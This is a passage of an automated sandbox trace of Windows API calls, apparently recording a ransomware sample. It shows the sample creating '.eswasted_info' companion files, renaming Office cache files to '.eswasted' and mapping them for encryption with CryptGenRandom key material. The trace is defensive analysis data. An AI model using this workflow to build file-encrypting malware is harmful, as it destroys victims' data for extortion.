pbBuffer=0x4ec5f8) returned 1 [0071.161] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0071.161] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml.eswasted_info" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\branding.xml.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0071.161] WriteFile (in: hFile=0x110, lpBuffer=0x4ec5f8*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x121fec4, lpOverlapped=0x0 | out: lpBuffer=0x4ec5f8*, lpNumberOfBytesWritten=0x121fec4*=0xa46, lpOverlapped=0x0) returned 1 [0071.162] SetEndOfFile (hFile=0x110) returned 1 [0071.162] SetFilePointer (in: hFile=0x110, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0071.163] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec5f8 | out: hHeap=0x4a0000) returned 1 [0071.163] lstrcpyW (in: lpString1=0x4e1b70, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0071.163] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\branding.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml.eswasted" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\branding.xml.eswasted")) returned 1 [0071.163] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml.eswasted" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\branding.xml.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0071.163] CreateFileMappingW (hFile=0x11c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x120 [0071.164] GetFileSize (in: hFile=0x11c, lpFileSizeHigh=0x121fe94 | out: lpFileSizeHigh=0x121fe94*=0x0) returned 0x91975 [0071.164] MapViewOfFile (hFileMappingObject=0x120, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x91975) returned 0x1220000 [0071.164] CloseHandle (hObject=0x11c) returned 1 [0071.185] CryptAcquireContextW (in: phProv=0x121fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fe84*=0x4e5ff0) returned 1 [0071.186] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4de330 | out: pbBuffer=0x4de330) returned 1 [0071.186] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0071.186] CryptAcquireContextW (in: phProv=0x121fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fbec*=0x4e5ff0) returned 1 [0071.187] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x121fc08 | out: pbBuffer=0x121fc08) returned 1 [0071.187] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0071.195] SetEndOfFile (hFile=0x110) returned 1 [0071.197] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec5f8 | out: hHeap=0x4a0000) returned 1 [0071.197] CloseHandle (hObject=0x110) returned 1 [0071.199] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e1ab8 | out: hHeap=0x4a0000) returned 1 [0071.199] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd7f8 | out: hHeap=0x4a0000) returned 1 [0071.199] _aulldvrm () returned 0x0 [0071.199] CryptAcquireContextW (in: phProv=0x121fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fecc*=0x4e5ff0) returned 1 [0071.200] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x121ff08 | out: pbBuffer=0x121ff08) returned 1 [0071.200] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0071.200] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml") returned 83 [0071.200] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x2b0) returned 0x4f5f48 [0071.200] lstrcpyW (in: lpString1=0x4f5fee, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0071.200] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4ec5f8 [0071.200] CryptAcquireContextW (in: phProv=0x121fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fea8*=0x4e5ff0) returned 1 [0071.201] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4ec5f8 | out: pbBuffer=0x4ec5f8) returned 1 [0071.201] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0071.201] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml.eswasted_info" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\accessmuiset.xml.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0071.201] WriteFile (in: hFile=0x110, lpBuffer=0x4ec5f8*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x121fec4, lpOverlapped=0x0 | out: lpBuffer=0x4ec5f8*, lpNumberOfBytesWritten=0x121fec4*=0xa46, lpOverlapped=0x0) returned 1 [0071.202] SetEndOfFile (hFile=0x110) returned 1 [0071.202] SetFilePointer (in: hFile=0x110, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0071.202] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec5f8 | out: hHeap=0x4a0000) returned 1 [0071.202] lstrcpyW (in: lpString1=0x4f5fee, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0071.202] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\accessmuiset.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml.eswasted" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\accessmuiset.xml.eswasted")) returned 1 [0071.203] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml.eswasted" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\accessmuiset.xml.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0071.203] CreateFileMappingW (hFile=0x120, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x118 [0071.203] GetFileSize (in: hFile=0x120, lpFileSizeHigh=0x121fe94 | out: lpFileSizeHigh=0x121fe94*=0x0) returned 0x333 [0071.203] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x333) returned 0x2d0000 [0071.203] CloseHandle (hObject=0x120) returned 1 [0071.205] CryptAcquireContextW (in: phProv=0x121fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fe84*=0x4e5ff0) returned 1 [0071.206] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4e1b00 | out: pbBuffer=0x4e1b00) returned 1 [0071.206] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0071.206] CryptAcquireContextW (in: phProv=0x121fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fbec*=0x4e5ff0) returned 1 [0071.207] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x121fc08 | out: pbBuffer=0x121fc08) returned 1 [0071.207] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0071.215] SetEndOfFile (hFile=0x110) returned 1 [0071.217] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec5f8 | out: hHeap=0x4a0000) returned 1 [0071.217] CloseHandle (hObject=0x110) returned 1 [0071.218] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4f5f48 | out: hHeap=0x4a0000) returned 1 [0071.218] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd910 | out: hHeap=0x4a0000) returned 1 [0071.218] _aulldvrm () returned 0x0 [0071.218] CryptAcquireContextW (in: phProv=0x121fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fecc*=0x4e5ff0) returned 1 [0071.219] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x121ff08 | out: pbBuffer=0x121ff08) returned 1 [0071.219] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0071.219] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0071.219] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x2a2) returned 0x4e1ab8 [0071.219] lstrcpyW (in: lpString1=0x4e1b50, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0071.219] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4ec5f8 [0071.219] CryptAcquireContextW (in: phProv=0x121fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fea8*=0x4e5ff0) returned 1 [0071.220] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4ec5f8 | out: pbBuffer=0x4ec5f8) returned 1 [0071.220] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0071.220] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml.eswasted_info" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\setup.xml.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0071.220] WriteFile (in: hFile=0x110, lpBuffer=0x4ec5f8*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x121fec4, lpOverlapped=0x0 | out: lpBuffer=0x4ec5f8*, lpNumberOfBytesWritten=0x121fec4*=0xa46, lpOverlapped=0x0) returned 1 [0071.221] SetEndOfFile (hFile=0x110) returned 1 [0071.221] SetFilePointer (in: hFile=0x110, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0071.222] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec5f8 | out: hHeap=0x4a0000) returned 1 [0071.222] lstrcpyW (in: lpString1=0x4e1b50, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0071.222] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml.eswasted" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\setup.xml.eswasted")) returned 1 [0071.225] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml.eswasted" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\setup.xml.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0071.225] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x120 [0071.225] GetFileSize (in: hFile=0x118, lpFileSizeHigh=0x121fe94 | out: lpFileSizeHigh=0x121fe94*=0x0) returned 0xa40 [0071.225] MapViewOfFile (hFileMappingObject=0x120, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xa40) returned 0x2d0000 [0071.225] CloseHandle (hObject=0x118) returned 1 [0071.231] CryptAcquireContextW (in: phProv=0x121fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fe84*=0x4e5ff0) returned 1 [0071.232] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4dd818 | out: pbBuffer=0x4dd818) returned 1 [0071.232] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0071.232] CryptAcquireContextW (in: phProv=0x121fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fbec*=0x4e5ff0) returned 1 [0071.232] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x121fc08 | out: pbBuffer=0x121fc08) returned 1 [0071.232] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0071.240] SetEndOfFile (hFile=0x110) returned 1 [0071.243] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec5f8 | out: hHeap=0x4a0000) returned 1 [0071.243] CloseHandle (hObject=0x110) returned 1 [0071.244] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e1ab8 | out: hHeap=0x4a0000) returned 1 [0071.244] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e3ff0 | out: hHeap=0x4a0000) returned 1 [0071.244] _aulldvrm () returned 0x0 [0071.244] CryptAcquireContextW (in: phProv=0x121fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fecc*=0x4e5ff0) returned 1 [0071.245] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x121ff08 | out: pbBuffer=0x121ff08) returned 1 [0071.245] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0071.245] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 81 [0071.245] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x2ac) returned 0x4f5f48 [0071.245] lstrcpyW (in: lpString1=0x4f5fea, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0071.245] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4ec5f8 [0071.245] CryptAcquireContextW (in: phProv=0x121fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fea8*=0x4e5ff0) returned 1 [0071.246] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4ec5f8 | out: pbBuffer=0x4ec5f8) returned 1 [0071.246] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0071.246] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml.eswasted_info" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\office32ww.xml.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0071.247] WriteFile (in: hFile=0x110, lpBuffer=0x4ec5f8*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x121fec4, lpOverlapped=0x0 | out: lpBuffer=0x4ec5f8*, lpNumberOfBytesWritten=0x121fec4*=0xa46, lpOverlapped=0x0) returned 1 [0071.248] SetEndOfFile (hFile=0x110) returned 1 [0071.248] SetFilePointer (in: hFile=0x110, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0071.248] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec5f8 | out: hHeap=0x4a0000) returned 1 [0071.248] lstrcpyW (in: lpString1=0x4f5fea, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0071.248] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\office32ww.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml.eswasted" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\office32ww.xml.eswasted")) returned 1 [0071.249] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml.eswasted" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\office32ww.xml.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0071.249] CreateFileMappingW (hFile=0x120, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x118 [0071.249] GetFileSize (in: hFile=0x120, lpFileSizeHigh=0x121fe94 | out: lpFileSizeHigh=0x121fe94*=0x0) returned 0x10b2 [0071.249] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x10b2) returned 0x2d0000 [0071.249] CloseHandle (hObject=0x120) returned 1 [0071.252] CryptAcquireContextW (in: phProv=0x121fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fe84*=0x4e5ff0) returned 1 [0071.252] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4dd818 | out: pbBuffer=0x4dd818) returned 1 [0071.252] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0071.252] CryptAcquireContextW (in: phProv=0x121fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fbec*=0x4e5ff0) returned 1 [0071.253] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x121fc08 | out: pbBuffer=0x121fc08) returned 1 [0071.253] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0071.261] SetEndOfFile (hFile=0x110) returned 1 [0071.263] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec5f8 | out: hHeap=0x4a0000) returned 1 [0071.264] CloseHandle (hObject=0x110) returned 1 [0071.265] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4f5f48 | out: hHeap=0x4a0000) returned 1 [0071.265] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dda10 | out: hHeap=0x4a0000) returned 1 [0071.265] _aulldvrm () returned 0x0 [0071.265] CryptAcquireContextW (in: phProv=0x121fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fecc*=0x4e5ff0) returned 1 [0071.266] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x121ff08 | out: pbBuffer=0x121ff08) returned 1 [0071.266] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0071.266] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 91 [0071.266] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x2c0) returned 0x4e1ab8 [0071.266] lstrcpyW (in: lpString1=0x4e1b6e, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0071.266] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4ec5f8 [0071.266] CryptAcquireContextW (in: phProv=0x121fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fea8*=0x4e5ff0) returned 1 [0071.267] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4ec5f8 | out: pbBuffer=0x4ec5f8) returned 1 [0071.267] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0071.267] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms.eswasted_info" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0071.267] WriteFile (in: hFile=0x110, lpBuffer=0x4ec5f8*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x121fec4, lpOverlapped=0x0 | out: lpBuffer=0x4ec5f8*, lpNumberOfBytesWritten=0x121fec4*=0xa46, lpOverlapped=0x0) returned 1 [0071.268] SetEndOfFile (hFile=0x110) returned 1 [0071.268] SetFilePointer (in: hFile=0x110, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0071.268] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec5f8 | out: hHeap=0x4a0000) returned 1 [0071.268] lstrcpyW (in: lpString1=0x4e1b6e, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0071.268] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms.eswasted" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms.eswasted")) returned 1 [0071.269] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms.eswasted" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0071.269] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x120 [0071.269] GetFileSize (in: hFile=0x118, lpFileSizeHigh=0x121fe94 | out: lpFileSizeHigh=0x121fe94*=0x0) returned 0xaec3a [0071.269] MapViewOfFile (hFileMappingObject=0x120, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xaec3a) returned 0x1220000 [0071.269] CloseHandle (hObject=0x118) returned 1 [0071.307] CryptAcquireContextW (in: phProv=0x121fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fe84*=0x4e5ff0) returned 1 [0071.307] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4d91f0 | out: pbBuffer=0x4d91f0) returned 1 [0071.307] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0071.308] CryptAcquireContextW (in: phProv=0x121fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fbec*=0x4e5ff0) returned 1 [0071.308] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x121fc08 | out: pbBuffer=0x121fc08) returned 1 [0071.308] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0071.317] SetEndOfFile (hFile=0x110) returned 1 [0071.322] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec5f8 | out: hHeap=0x4a0000) returned 1 [0071.322] CloseHandle (hObject=0x110) returned 1 [0071.324] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e1ab8 | out: hHeap=0x4a0000) returned 1 [0071.324] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ddb10 | out: hHeap=0x4a0000) returned 1 [0071.324] _aulldvrm () returned 0x0 [0071.324] CryptAcquireContextW (in: phProv=0x121fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fecc*=0x4e5ff0) returned 1 [0071.325] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x121ff08 | out: pbBuffer=0x121ff08) returned 1 [0071.325] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0071.325] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0071.325] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x2a2) returned 0x4e1ab8 [0071.325] lstrcpyW (in: lpString1=0x4e1b50, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0071.325] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4ec5f8 [0071.325] CryptAcquireContextW (in: phProv=0x121fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fea8*=0x4e5ff0) returned 1 [0071.326] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4ec5f8 | out: pbBuffer=0x4ec5f8) returned 1 [0071.326] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0071.326] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml.eswasted_info" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\setup.xml.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0071.326] WriteFile (in: hFile=0x110, lpBuffer=0x4ec5f8*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x121fec4, lpOverlapped=0x0 | out: 